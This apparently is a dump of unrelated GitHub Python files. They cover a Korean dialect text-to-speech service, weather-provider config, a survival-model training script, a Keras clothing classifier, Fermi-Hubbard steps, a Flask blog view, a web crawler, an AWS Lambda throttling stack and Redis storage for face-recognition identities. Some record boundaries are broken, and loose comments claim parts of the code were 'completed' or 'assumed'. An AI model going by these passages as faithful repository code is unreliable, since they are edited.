synthesize): {}'.format(time.time() - total_time))\n    tts = TTS(dialect_type=model_type, korean=korean, dialect=dialect,ip=ip, error=error_sentences)\n    # db.session.add(tts)\n    # db.session.commit()\n    return res\n
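# A minimal client-side call against the endpoint above, assuming the app is
# served locally on port 5000 (URL and form values are illustrative):
#
#   import requests
#   resp = requests.post('http://localhost:5000/ml-inference',
#                        data={'gender-options': '여성',
#                              'model-type-options': '제주',
#                              'input-text': '안녕하세요'})
#   payload = resp.json()  # {'translated_text': ..., 'audio_stream': ...}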
\ndef test():\n    test_txts = read_ejn(file_path=r'source/filelists/donate_comment_500000.csv')\n    print(request.form)\n    gender = \"male\"\n    model_type = \"경상\"\n\n    # ##### select model\n    if model_type=='표준':\n        ### standard\n        korean2dialect = jeju_translation\n        text2speech = jeju_speech\n    elif model_type=='제주':\n        ## with jeju voice, need translation (standard --> jeju language)\n        korean2dialect = jeju_translation\n        text2speech = jeju_speech\n    elif model_type=='경상':\n        ## Gyeongsang\n        korean2dialect = gyeong_translation\n        text2speech = gyeong_speech\n    elif model_type=='전라':\n        korean2dialect = jeon_translation\n        text2speech = jeon_speech\n    else:\n        return app.response_class(response=None,status=404,mimetype='application/json')\n\n    test_result = []\n    save_flag=0\n    for row in test_txts.itertuples():\n        korean = row[1]\n        dialect = korean2dialect.transform(korean)  # translate\n        txt_list = clean_text(txt=dialect)  # clean the translated text\n        print(txt_list)\n        try:\n            base_64_wav_file, audio = text2speech.forward(txt_list)  # text -> wav file\n            test_result.append([korean]+ txt_list + [len(txt_list[0]), audio.shape[0]])\n        except Exception:\n            test_result.append([korean]+ txt_list +[len(txt_list[0]), None])\n\n        save_flag +=1\n        if save_flag%100==0:\n            test_result_df = pd.DataFrame(test_result, columns=['ejn_text', 'trans_text','text_length', 'audio_length'])\n            test_result_df.to_csv('test_result.csv')\n    test_result_df = pd.DataFrame(test_result, columns=['ejn_text', 'text', 'text_length', 'audio_length'])\n    test_result_df.to_csv('test_result.csv')\n    # return_data = {'translated_text': dialect, 'audio_stream': wav_file}\n    # res = app.response_class(response=json.dumps(return_data), status=200, mimetype='application/json')\n    return True\n\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\ndef read_ejn(file_path):\n    # file_path = r'source/filelists/donate_comment_500000.csv'\n    ejn_df = pd.read_csv(file_path, encoding='utf-8', header=None)\n    ejn_df=ejn_df.sample(frac=1)\n    ejn_df=ejn_df.iloc[:5000,:]\n    text = ejn_df.iloc[:,0]\n    ejn_df['length'] = text.str.len()\n    ejn_df.sort_values('length', ascending=False, inplace=True)\n    return ejn_df","repo_name":"Thien223/TTS_webservice","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17681365107","text":"\"\"\"Application configuration data.\"\"\"\n\nimport logging\nimport os\nimport os.path\nfrom abc import abstractmethod\nfrom enum import Enum\nfrom typing import Annotated, Dict, List, Literal, Optional, Union\n\nimport yaml\nfrom pydantic import BaseModel, Field, validator\n\nfrom .providers import (\n    WeatherProvider,\n    accuweather,\n    ambientwx,\n    noaa,\n    openweather,\n    wunderground,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass Units(str, Enum):\n    IMPERIAL = \"imperial\"\n    METRIC = \"metric\"\n\n\nclass StationConfigBase(BaseModel):\n    \"\"\"Base configuration for weather providers.\"\"\"\n\n    __providers__ = {}\n\n    name: str\n    provider: WeatherProvider\n    update_interval: Optional[int] = None\n\n    @abstractmethod\n    def initialize(self):\n        \"\"\"Initialize a new instance of the station based on this config.\"\"\"\n\n\nclass AccuWeatherConfig(StationConfigBase):\n    \"\"\"Station configuration for AccuWeather.\"\"\"\n\n    api_key: str\n    location: Union[str, int]\n    provider: Literal[WeatherProvider.ACCUWEATHER]\n\n    def initialize(self):\n        \"\"\"Initialize a new AccuWeather station based on this config.\"\"\"\n\n        return accuweather.Station(\n            name=self.name,\n            api_key=self.api_key,\n            location=self.location,\n        )\n\n\nclass AmbientWeatherConfig(StationConfigBase):\n    \"\"\"Station configuration for Ambient Weather Network.\"\"\"\n\n    app_key: str\n    user_key: str\n    device_id: str\n    provider: Literal[WeatherProvider.AMBIENT]\n\n    def initialize(self):\n        
\"\"\"Initialize a new Ambient Weather station based on this config.\"\"\"\n\n return ambientwx.Station(\n name=self.name,\n app_key=self.app_key,\n user_key=self.user_key,\n device_id=self.device_id,\n )\n\n\nclass NOAA_Config(StationConfigBase):\n \"\"\"Station configuration for NOAA weather.\"\"\"\n\n station: str\n provider: Literal[WeatherProvider.NOAA]\n\n def initialize(self):\n \"\"\"Initialize a new NOAA station based on this config.\"\"\"\n\n return noaa.Station(\n name=self.name,\n station=self.station,\n )\n\n\nclass OpenWeatherMapConfig(StationConfigBase):\n \"\"\"Station configuration for OpenWeatherMap.\"\"\"\n\n api_key: str\n latitude: float\n longitude: float\n provider: Literal[WeatherProvider.OPENWEATHERMAP]\n\n def initialize(self):\n \"\"\"Initialize a new OpenWeatherMap station based on this config.\"\"\"\n\n return openweather.Station(\n name=self.name,\n api_key=self.api_key,\n latitude=self.latitude,\n longitude=self.longitude,\n )\n\n\nclass WeatherUndergroundConfig(StationConfigBase):\n \"\"\"Station configuration for Weather Underground.\"\"\"\n\n api_key: str\n station_id: str\n provider: Literal[WeatherProvider.WUNDERGROUND]\n\n def initialize(self):\n \"\"\"Initialize a new Weather Underground PWS based on this config.\"\"\"\n\n return wunderground.Station(\n name=self.name,\n api_key=self.api_key,\n station_id=self.station_id,\n )\n\n\nStationConfig = Annotated[\n Union[\n AccuWeatherConfig,\n AmbientWeatherConfig,\n NOAA_Config,\n OpenWeatherMapConfig,\n WeatherUndergroundConfig,\n ],\n Field(discriminator=\"provider\"),\n]\n\n\nclass AppConfig(BaseModel):\n \"\"\"Application configuration for wxdat.\"\"\"\n\n database: str = \"sqlite:///wxdat.db\"\n update_interval: int = 300\n stations: List[StationConfig] = []\n units: Units = Units.METRIC\n logging: Optional[Dict] = None\n metrics: Optional[int] = None\n\n @validator(\"database\", pre=True, always=True)\n def _check_env_for_database_str(cls, val):\n env = os.getenv(\"WXDAT_DATABASE_URL\", None)\n return val if env is None else env\n\n @property\n def DATABASE_CONN_STRING(self):\n return self.database\n\n @classmethod\n def load(cls, config_file):\n if not os.path.exists(config_file):\n raise FileNotFoundError(f\"config file does not exist: {config_file}\")\n\n with open(config_file) as fp:\n data = yaml.load(fp, Loader=yaml.SafeLoader)\n conf = AppConfig(**data)\n\n logger = cls._configure_logging(conf)\n logger.info(\"loaded AppConfig from: %s\", config_file)\n\n return conf\n\n @classmethod\n def _configure_logging(cls, conf):\n import logging.config\n\n if conf.logging is None:\n # using dictConfig() here replaces the existing configuration of all loggers\n # this approach is more predictable than logging.basicConfig(level=logging.WARN)\n logconf = {\"version\": 1, \"incremental\": False, \"root\": {\"level\": \"WARN\"}}\n\n else:\n logconf = conf.logging\n\n logging.config.dictConfig(logconf)\n\n return logging.getLogger()\n","repo_name":"jheddings/wxdat","sub_path":"src/wxdat/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12491911081","text":"import torch\nimport numpy as np\nfrom DataLoader import load_BRCA\nfrom train import trainnet\nfrom km_logrank import km_logrank_picture\n\n\ndevice_id = 0\ntorch.cuda.set_device(device_id)\ndtype = torch.FloatTensor\n\n''' Net Settings'''\nfeature_size = 250 \nclass_size = 1 \nlatent_size = 10 \n\n''' Initialize 
'''\nInitial_Learning_Rate = [0.03, 0.01, 0.001, 0.00075]\nL2_Lambda = [0.1, 0.01, 0.005, 0.001]\nnum_epochs = 30  ### for grid search\nNum_EPOCHS = 50  ### for training\n\n''' load data \nneed to provide the absolute file path.\n'''\nname='BRCA'\nx_train, ytime_train, yevent_train = load_BRCA(f\"/Data/ljy/single_cox250/{name}_train_250.csv\", dtype)\t#\nx_valid, ytime_valid, yevent_valid = load_BRCA(f\"/Data/ljy/single_cox250/{name}_vaild_250.csv\", dtype)\nx_test, ytime_test, yevent_test = load_BRCA(f\"/Data/ljy/single_cox250/{name}_test_250.csv\", dtype)\n\nopt_l2_loss = 0\nopt_lr_loss = 0\nopt_loss = torch.Tensor([float(\"Inf\")])\n###if gpu is being used\nif torch.cuda.is_available():\n\topt_loss = opt_loss.cuda()\n###\nopt_c_index_va = 0\nopt_c_index_tr = 0\n\n###grid search the optimal hyperparameters using train and validation data\nfor l2 in L2_Lambda:\n\tfor lr in Initial_Learning_Rate:\n\t\tloss_train, loss_valid, c_index_tr, c_index_va , _ = trainnet(x_train, ytime_train, yevent_train, \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tx_valid, ytime_valid, yevent_valid, \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeature_size, class_size, latent_size, \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tlr, l2, num_epochs, name)\n\t\tif loss_valid < opt_loss:\n\t\t\topt_l2_loss = l2\n\t\t\topt_lr_loss = lr\n\t\t\topt_loss = loss_valid\n\t\t\topt_c_index_tr = c_index_tr\n\t\t\topt_c_index_va = c_index_va\n\t\tprint (\"L2: \", l2, \"LR: \", lr, \"Loss in Validation: \", loss_valid,\"opt_c_index_tr:\",opt_c_index_tr,\"opt_c_index_va:\",opt_c_index_va)\n\n\n\n###train CVaDeS with optimal hyperparameters using train data, and then evaluate the trained model with test data\n###Note that test data are only used to evaluate the trained CVaDeS\nloss_train, loss_test, c_index_tr, c_index_te, eval_pred = trainnet(x_train, ytime_train, yevent_train, \\\n\t\t\t\t\t\t\tx_test, ytime_test, yevent_test, \\\n\t\t\t\t\t\t\tfeature_size, class_size, latent_size, \\\n\t\t\t\t\t\t\topt_lr_loss, opt_l2_loss, Num_EPOCHS, name)\n\nkm_logrank_picture(eval_pred.cpu(),ytime_test.cpu(),yevent_test.cpu())\nprint (\"Optimal L2: \", opt_l2_loss, \"Optimal LR: \", opt_lr_loss)\nprint(\"C-index in Test: \", c_index_te)\n","repo_name":"ljy66666/CVaDeS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
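# The nested grid search in main.py above enumerates every (l2, lr) pair;
# itertools.product expresses the same walk in a single loop (values copied
# from the script, training call elided):
import itertools

L2_Lambda = [0.1, 0.01, 0.005, 0.001]
Initial_Learning_Rate = [0.03, 0.01, 0.001, 0.00075]

for l2, lr in itertools.product(L2_Lambda, Initial_Learning_Rate):
    # train with (l2, lr) and keep the pair with the lowest validation loss,
    # exactly as the explicit double loop does
    pass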
 +{"seq_id":"16600243172","text":"\"\"\"For when you want to test each of the sub-categories that branch off a parent category\"\"\"\r\n\r\nimport numpy as np\r\nimport random\r\nfrom keras.preprocessing import image\r\nimport os\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras import models\r\nfrom keras import layers\r\nfrom keras import optimizers\r\nimport keras\r\n\r\nbase_dir = 'D:/dataset/'\r\ntrain_dir = os.path.join(base_dir, 'Trainset')\r\n\r\ntest='D:/dataset/Testset/Outer/'\r\ntest_Outer_Blouson_dir=os.path.join(test,'Outer_Blouson')\r\ntest_Outer_Bluejean_jacket_dir=os.path.join(test,'Outer_Bluejean_jacket')\r\ntest_Outer_Cardigan_dir=os.path.join(test,'Outer_Cardigan')\r\ntest_Outer_Nylon_Jacket_dir=os.path.join(test,'Outer_Nylon_Jacket')\r\ntest_Outer_Padding_dir=os.path.join(test,'Outer_Padding')\r\ntest_Outer_Suit_jacket_dir=os.path.join(test,'Outer_Suit_jacket')\r\ntest_Outer_ThinCoat_dir=os.path.join(test,'Outer_ThinCoat')\r\ntest_Outer_WinterCoat_dir=os.path.join(test,'Outer_WinterCoat')\r\n\r\nepochs = 3\r\nimg_width, img_height = 220, 220\r\ntrain_size = 800\r\nconv_base = keras.applications.InceptionV3(weights='imagenet',include_top = False,input_shape=(img_width, img_height, 3))\r\nconv=conv_base.output.shape\r\n\r\nconv_base.summary()\r\ndatagen = ImageDataGenerator(rescale=1. / 255)\r\nbatch_size = 16\r\n\r\n\r\ndef extract_features(directory, sample_count):  # labelling\r\n    features = np.zeros(shape=(sample_count, conv[1], conv[2], conv[3]))\r\n    labels = np.zeros(shape=(sample_count,3))\r\n    generator = datagen.flow_from_directory(directory,\r\n                                            target_size=(img_width, img_height),\r\n                                            batch_size=batch_size,\r\n                                            class_mode='categorical')\r\n    i = 0\r\n    for inputs_batch, labels_batch in generator:\r\n        print(inputs_batch.shape,i)\r\n        features_batch = conv_base.predict(inputs_batch)\r\n        features[i * batch_size : (i + 1) * batch_size] = features_batch\r\n        labels[i * batch_size: (i + 1) * batch_size] = labels_batch\r\n        i += 1\r\n        if i * batch_size >= sample_count:\r\n            break\r\n    return features, labels\r\ntrain_features, train_labels = extract_features(train_dir, train_size)\r\n\r\n\r\nmodel = models.Sequential()\r\nmodel.add(layers.Flatten(input_shape=train_features.shape[1:]))\r\nmodel.add(layers.Dense(256, activation='relu', input_dim=(train_features.shape[1]*train_features.shape[2]*train_features.shape[3])))\r\nmodel.add(layers.Dropout(0.25))\r\nmodel.add(layers.Dense(3, activation='softmax'))\r\nmodel.summary()\r\nmodel.compile(optimizer=optimizers.Adam(0.001),loss='categorical_crossentropy',)\r\nhistory = model.fit(train_features, train_labels,batch_size=batch_size,epochs=epochs)\r\nmodel.save('JH_nonFine.h5')\r\n# model built, trained on the extracted features and saved above\r\n\r\n
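# Extracting the bottleneck features is the slow step above; caching them to
# disk lets later experiments skip the InceptionV3 forward pass entirely
# (the cache file name below is illustrative):
import numpy as np

np.savez_compressed('features_cache.npz', x=train_features, y=train_labels)
# ...and on a later run:
cache = np.load('features_cache.npz')
train_features, train_labels = cache['x'], cache['y']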
def visualize_predictions(classifier, n_cases):\r\n    for i in range(0,n_cases):\r\n        path = random.choice([test_Outer_Blouson_dir,test_Outer_Bluejean_jacket_dir,test_Outer_Cardigan_dir,test_Outer_Nylon_Jacket_dir,test_Outer_Padding_dir,test_Outer_Suit_jacket_dir,test_Outer_ThinCoat_dir,test_Outer_WinterCoat_dir])  # pick a random test-data directory\r\n        random_img = random.choice(os.listdir(path))\r\n        img_path = os.path.join(path, random_img)  # pick a random test image\r\n        img = image.load_img(img_path, target_size=(img_width, img_height))  # preprocess the randomly chosen image\r\n        img_tensor = image.img_to_array(img)\r\n        img_tensor /= 255.  # scale pixel values into the 0-1 range\r\n        features = conv_base.predict(img_tensor.reshape(1,img_width, img_height, 3))\r\n        try:\r\n            prediction = classifier.predict_classes(features)\r\n        except:\r\n            prediction = classifier.predict_classes(features.reshape(1, train_features.shape[1]*train_features.shape[2]*train_features.shape[3]))\r\n\r\n        print(img_path)\r\n        print(prediction)\r\n        if prediction == 0:\r\n            print('Onepiece')\r\n        elif prediction == 1:\r\n            print('Outer')\r\n        elif prediction == 2:\r\n            print('Pants')\r\n        elif prediction == 3:\r\n            print('Skirt')\r\n        else:\r\n            print('Top')\r\n        \r\n        \r\nvisualize_predictions(model, 10)","repo_name":"dlwlsdn201/2020CapstonDesign_OOTD-Project","sub_path":"JH_CNN_Outer.py","file_name":"JH_CNN_Outer.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
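# The five-way if/elif that prints the predicted class above can be reduced
# to an index lookup. Note the model is compiled with only 3 output units,
# so labels 3 ('Skirt') and 4 ('Top') can never actually be predicted here;
# the list below is an illustrative sketch, not part of the original script:
CLASS_NAMES = ['Onepiece', 'Outer', 'Pants', 'Skirt', 'Top']

def decode_prediction(label: int) -> str:
    return CLASS_NAMES[label]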
 +{"seq_id":"34819002620","text":"from typing import Optional\n\nfrom zquantum.core.openfermion import save_interaction_operator\nfrom zquantum.core.utils import ValueEstimate, save_value_estimate\nfrom zquantum.solid_state.fermi_hubbard import (\n    calculate_exact_density_of_energy_for_2_D_fermi_hubbard,\n    compute_energy_density,\n    get_fermi_hubbard_hamiltonian,\n)\n\n\ndef calculate_and_save_energy_density(\n    energy: float, x_dimension: int, y_dimension: int, chemical_potential: float\n):\n    \"\"\"Calculates and saves energy density from energy.\"\"\"\n    energy_density = compute_energy_density(\n        energy, x_dimension, y_dimension, chemical_potential\n    )\n    val_estimate = ValueEstimate(energy_density)\n    save_value_estimate(val_estimate, \"value-estimate.json\")\n\n\ndef calculate_and_save_exact_density_of_energy_for_2_D_fermi_hubbard(\n    tunneling_energy: float,\n    coulomb_interaction_energy: float,\n    x_dimension: Optional[int] = None,\n    y_dimension: int = 1,\n    magnetic_field: float = 0.0,\n) -> float:\n    \"\"\"\n    Calculates and saves the exact density of energy for a 1D Fermi-Hubbard model\n    of finite length.\n    It works only for the half-filling case.\n\n    Args:\n        tunneling_energy: Tunneling energy\n        coulomb_interaction_energy: Coulomb interaction energy.\n        x_dimension: x dimension of the FH model\n        y_dimension: y dimension of the FH model\n        magnetic_field: strength of the magnetic field\n\n    \"\"\"\n    energy_density = calculate_exact_density_of_energy_for_2_D_fermi_hubbard(\n        tunneling_energy,\n        coulomb_interaction_energy,\n        x_dimension,\n        y_dimension,\n        magnetic_field,\n    )\n\n    val_estimate = ValueEstimate(energy_density)\n    save_value_estimate(val_estimate, \"value-estimate.json\")\n\n\ndef build_and_save_fermi_hubbard_hamiltonian(\n    x_dimension,\n    y_dimension,\n    tunneling,\n    coulomb,\n    chemical_potential=0.0,\n    magnetic_field=0.0,\n    periodic=True,\n    spinless=False,\n    particle_hole_symmetry=False,\n):\n    \"\"\"\n    Generates and saves the Hamiltonian corresponding to the Fermi-Hubbard Model for\n    a number of interacting fermions on a rectangular lattice of dimensions\n    x_dimension times y_dimension.\n\n    The Hamiltonian has the form:\n\n    H = -t \\sum_{\\langle i,j \\rangle} \\sum_{\\sigma} (a^{\\dagger}_{i,\\sigma} a_{j,\\sigma}\n                 + a^{\\dagger}_{j,\\sigma} a_{i,\\sigma})\n         + U \\sum_{i} a^{\\dagger}_{i,up} a_{i,up}a^{\\dagger}_{i,down} a_{i,down}\n        + \\mu \\sum_{i} \\sum_{\\sigma} a^{\\dagger}_{i,\\sigma} a_{i,\\sigma}\n        - h \\sum_{i} (a^{\\dagger}_{i,up} a_{i,up} - a^{\\dagger}_{i,down} a_{i,down})\n    where \\sigma is the spin (up or down)\n        t is the tunneling amplitude\n        U is the Coulomb potential\n        \\mu is the chemical potential\n        h is the magnetic field\n\n    Args:\n        x_dimension (int): The width of the grid.\n        y_dimension (int): The height of the grid.\n        tunneling (float): The tunneling amplitude :math:`t`.\n        coulomb (float): The attractive local interaction strength :math:`U`.\n        chemical_potential (float, optional): The chemical potential\n            :math:`\\mu` at each site. Default value is 0.\n        magnetic_field (float, optional): The magnetic field :math:`h`\n            at each site. Default value is 0. Ignored for the spinless case.\n        periodic (bool, optional): If True, add periodic boundary conditions,\n            in both directions. Default is True.\n        spinless (bool, optional): If True, return a spinless Fermi-Hubbard\n            model. Default is False.\n        particle_hole_symmetry (bool, optional): If False, the repulsion\n            term corresponds to:\n            \\sum_{i} a^{\\dagger}_{i,up} a_{i,up}a^{\\dagger}_{i,down} a_{i,down}\n            If True, it corresponds to:\n            \\sum_{i} (a^{\\dagger}_{i,up} a_{i,up} - 1/2) (a^{\\dagger}_{i,down}a_{i,down} - 1/2)\n    \"\"\"  # noqa:W605 E501\n    hamiltonian = get_fermi_hubbard_hamiltonian(\n        x_dimension,\n        y_dimension,\n        tunneling,\n        coulomb,\n        chemical_potential,\n        magnetic_field,\n        periodic,\n        spinless,\n        particle_hole_symmetry,\n    )\n\n    save_interaction_operator(hamiltonian, \"hamiltonian.json\")\n","repo_name":"zapatacomputing/z-quantum-solid-state","sub_path":"steps/fermi_hubbard_model.py","file_name":"fermi_hubbard_model.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"15950812607","text":"from math import ceil\r\n\r\nfrom flask import current_app as app\r\nfrom flask import (\r\n    render_template,\r\n    request,\r\n    redirect,\r\n    url_for,\r\n    flash\r\n)\r\n\r\nfrom app.utils import get_config\r\nfrom app.utils.markdown import get_markdown\r\nfrom app.models import db, Posts\r\n\r\nfrom app.main import main\r\n\r\n@main.route(\"/posts\", methods=['GET'])\r\ndef posts():\r\n    page = request.args.get(\"page\", default=1, type=int)\r\n\r\n    if page <= 0:\r\n        flash(message=\"Invalid page number.\", category=\"warning\")\r\n        return redirect(url_for(\".posts\"))\r\n\r\n    # Fetch one page of visible posts\r\n    posts = Posts.query.filter_by(hidden=False).order_by(Posts.idx.desc())\\\r\n                 .offset((page-1) * get_config(\"post_page_size\"))\\\r\n                 .limit(get_config(\"post_page_size\"))\\\r\n                 .all()\r\n    \r\n    counts = ceil(Posts.query.filter_by(hidden=False).count() / get_config(\"post_page_size\"))\r\n\r\n    print(counts)\r\n\r\n    return render_template( f\"/front/{get_config('front_theme')}/posts/index.html\",\r\n                            path='',\r\n                            posts=posts,\r\n                            counts=counts,\r\n                            page=page )\r\n\r\n\r\n@main.route(\"/posts/<int:post_idx>\", methods=['GET'])\r\ndef post_detail(post_idx):\r\n    post = Posts.query.filter_by(idx=post_idx,\r\n                                 hidden=False).first()\r\n\r\n    if post is None:\r\n        flash(message=\"Invalid post selected.\", category=\"error\")\r\n        return redirect(url_for(\".posts\"))\r\n    \r\n    return render_template( f\"/front/{get_config('front_theme')}/posts/detail.html\",\r\n                            post=get_markdown(post.fullpath),\r\n                            title=post.title,\r\n                            abstract=post.abstract )\r\n\r\n","repo_name":"kkamikoon/ownblog","sub_path":"app/main/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
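# The page count above rounds up with math.ceil on a float division; pure
# integer arithmetic gives the same result without the float round-trip
# (a sketch, helper name illustrative):
def page_count(total_posts: int, page_size: int) -> int:
    return (total_posts + page_size - 1) // page_size

assert page_count(21, 10) == 3   # 21 posts at 10 per page -> 3 pages
assert page_count(20, 10) == 2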
 +{"seq_id":"35363910635","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 8 13:55:13 2018\n\n@author: yyuan1\n\"\"\"\nimport urllib.request\n\ndef get_page(url):\n    f = urllib.request.urlopen(url)\n    htmlPage = f.read().decode('utf-8') #https://stackoverflow.com/questions/47056068/python-3-6-typeerror-a-bytes-like-object-is-required-not-str-when-trying-to\n    return htmlPage\n\ndef get_next_target(page):\n    # find the next anchor tag and pull out the quoted URL it links to\n    # (body completed from the classic crawler pattern the function name implies)\n    start_link = page.find('<a href=')\n    if start_link == -1:\n        return None, 0\n    start_quote = page.find('\"', start_link)\n    end_quote = page.find('\"', start_quote + 1)\n    url = page[start_quote + 1:end_quote]\n    return url, end_quote\n\nfrom aws_cdk import (\n    Duration,\n    Stack,\n    aws_cloudwatch as cloudwatch,\n    aws_cloudwatch_actions as cloudwatch_actions,\n    aws_iam as iam,\n    aws_lambda as lambda_,\n    aws_logs as logs,\n    aws_sns as sns,\n    aws_sns_subscriptions as sns_subscriptions,\n)\nfrom constructs import Construct\n\n\n# NOTE: stack class name assumed from the file name lambdaStack.py\nclass LambdaStack(Stack):\n    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n        super().__init__(scope, construct_id, **kwargs)\n\n        self.sns_topic = sns.Topic(self, \"LambdaIvocationsLimitTopic\")\n\n        self.func_test = lambda_.Function(\n            self,\n            \"testLambda\",\n            code=lambda_.Code.from_asset(\"assets/lambda/testLambda\"),\n            handler=\"index.handler\",\n            runtime=lambda_.Runtime.PYTHON_3_9,\n            log_retention=logs.RetentionDays.ONE_WEEK,\n            timeout=Duration.minutes(15),\n            memory_size=128,\n        )\n\n        self.func_test_alarm = cloudwatch.Alarm(\n            self,\n            \"LambdaTestAlarm\",\n            comparison_operator=cloudwatch.ComparisonOperator.GREATER_THAN_OR_EQUAL_TO_THRESHOLD,\n            threshold=5,\n            evaluation_periods=30,\n            datapoints_to_alarm=5,\n            metric=self.func_test.metric_invocations(\n                period=Duration.minutes(1),\n            ),\n        )\n\n        self.func_test_alarm.add_alarm_action(\n            cloudwatch_actions.SnsAction(self.sns_topic),\n        )\n\n        self.func_disable_heavy = lambda_.Function(\n            self,\n            \"disableHeavyLambda\",\n            code=lambda_.Code.from_asset(\"assets/lambda/disableHeavyLambda\"),\n            handler=\"index.handler\",\n            runtime=lambda_.Runtime.PYTHON_3_9,\n            log_retention=logs.RetentionDays.ONE_WEEK,\n        )\n        self.func_disable_heavy.add_to_role_policy(\n            iam.PolicyStatement(\n                actions=[\"lambda:PutFunctionConcurrency\"], resources=[\"*\"]\n            )\n        )\n\n        self.sns_topic.add_subscription(\n            sns_subscriptions.LambdaSubscription(self.func_disable_heavy)\n        )\n","repo_name":"parisnakitakejser/video-tutorial-python-code","sub_path":"aws/AWS-CDK/Lambda/disable-lambda-on-to-many-ivocations/infrastructure/lambdaStack.py","file_name":"lambdaStack.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"35994147958","text":"import struct\nimport redis\nimport numpy as np\nimport json\nimport pdb\nimport time\nimport functools\nimport itertools\nfrom utils import GetServicesConfiguration\nfrom logger_utils import init_logger\n\nlogger=init_logger(__name__)\n\n\"\"\"\nin redis we store data for each person as follows:\n\n     key                              Description\n\nPERSON_|ID|_ENC_|nb| : an encoding with number nb for person with id ID\nPERSON_|ID|_ELI_|nb| : Eligibility of the encoding with number nb for person with id ID\nPERSON_|ID|_AGE_|nb| : Age of the encoding with number nb for person with id ID\nPERSON_|ID|_LAST_ENCODING : last number of an inserted for person with id ID, used to generate new keys for future encodings of this person\nPERSON_|ID|_LAST_TIME_MATCHED : last time this person was identified by the facial recognition system\nPERSON_|ID|_NB_TIME_MATCHED : number of times this person was identified by the facial recognition system\nPERSON_|ID|_KALMAN : KALMAN filter parameters\nPERSON_|ID|_LAST_UPDATE_KALMAN : Last 
#listOfIndex=argsort(all_enc_age)\n \n listOfIndex=np.argpartition(np.array(all_enc_age),len(all_enc_age)-nb_to_del)\n all_enc_keys=[all_enc_keys[i] for i in listOfIndex]\n \n for i in range(nb_to_del):\n #removeEncoding(all_enc_keys[i],INFORMATION_TO_USE=INFORMATION_TO_USE)\n removeEncoding(all_enc_keys[-i],INFORMATION_TO_USE=INFORMATION_TO_USE)\n\n #r.decrby(\"NB_ENC\",nb_to_del)\n\n \n\ndef control_number_of_encodings_in_redis(max_nb_enc=100,INFORMATION_TO_USE=[\"FACE_RECOGNITION\"]):\n nb_enc=int(r.get(\"NB_ENC\"))\n if(nb_enc>max_nb_enc):\n \n logger.warning(\"Controlling memory size taken by encodings... will delete {} old encodings\".format(max_nb_enc//5))\n removeOldEncodings(max_nb_enc//5,None,INFORMATION_TO_USE)\n\ndef get_all_ids():\n ids=json.loads(r.get(\"ALL_PERSON_IDS\"))\n return ids\n\ndef get_encoding_keys(person_IDs,sample=\"ALL\",max_enc_per_identity=50):\n listToGet=[]\n listAgeToGet=[]\n listOfLen=[] \n for person_ID in person_IDs:\n listToGet.append(\"PERSON_\"+str(person_ID)+\"_ENC_KEYS\")\n \n keys=list(map(json.loads,r.mget(listToGet)))\n \n if(sample ==\"ALL\"):\n return keys\n \"\"\"elif(sample==\"RANDOM LATEST\"):\n for lKey in keys:\n listAgeToGet.append(list(map(lambda x:x.replace(\"ENC\",\"AGE\"),lKey)))\n listOfLen.append(len(lKey))\n listOfLen.insert(0,0)\n ages=functools.reduce(lambda x,y:x+y,listAgeToGet)\n ages=np.array(list(map(int,r.mget(ages))))\n for i,lKey in keys:\n if(i==0):\n ##you are getting many keys at once its the same thing, must store all age in one list per identity implement this tomorow!\n if(listOfLen[i+1]>max_enc_per_identity):\n np.argpartition(ages[listOfLen[i]:listOfLen[i]+listOfLen[i+1]])\n else:\n pass\n \"\"\"\n \n\n\ndef store_new_encoding_key(person_IDs,new_keys,nbs):\n \n keys=get_encoding_keys(person_IDs)\n dictToSave={}\n dictToSaveNbs={}\n for i,k in enumerate(keys):\n keys[i].append(new_keys[i])\n dictToSave[\"PERSON_\"+str(person_IDs[i])+\"_ENC_KEYS\"]=json.dumps(keys[i])\n dictToSaveNbs[\"PERSON_\"+str(person_IDs[i])+\"_LAST_ENCODING\"]=nbs[i]\n \n r.mset(dictToSave)\n updateLastInsertedEncodingKey(person_IDs,nbs,dictToSaveNbs)\n\ndef remove_encoding_key(person_ID,key,INFO=[\"FACE_RECOGNITION\"]):\n keys=get_encoding_keys([person_ID])[-1]\n keys.remove(key)\n if(len(keys)>0):\n r.set(\"PERSON_\"+str(person_ID)+\"_ENC_KEYS\",json.dumps(keys))\n else:\n removeIdentity([person_ID],INFORMATION_TO_USE=INFO)\n\n\ndef addPerson(encoding,create_time,camera_ID,jsonStates=None):\n all_ids=get_all_ids()\n r.setnx(\"ID_COUNTER\",0)\n ID=r.incrby(\"ID_COUNTER\",1)\n all_ids.append(ID)\n r.set(\"ALL_PERSON_IDS\",json.dumps(all_ids))\n #last_time_matched=r.set(\"PERSON_\"+str(ID)+\"_LAST_TIME_MATCHED\",create_time)\n r.set(\"PERSON_\"+str(ID)+\"_CAM_ID\",str(camera_ID))\n logger.debug(\"Adding new person for camera {0} with ID {1}\".format(camera_ID,ID))\n if(jsonStates is not None):\n saveKalmanStateToRedis(jsonStates,[ID])\n 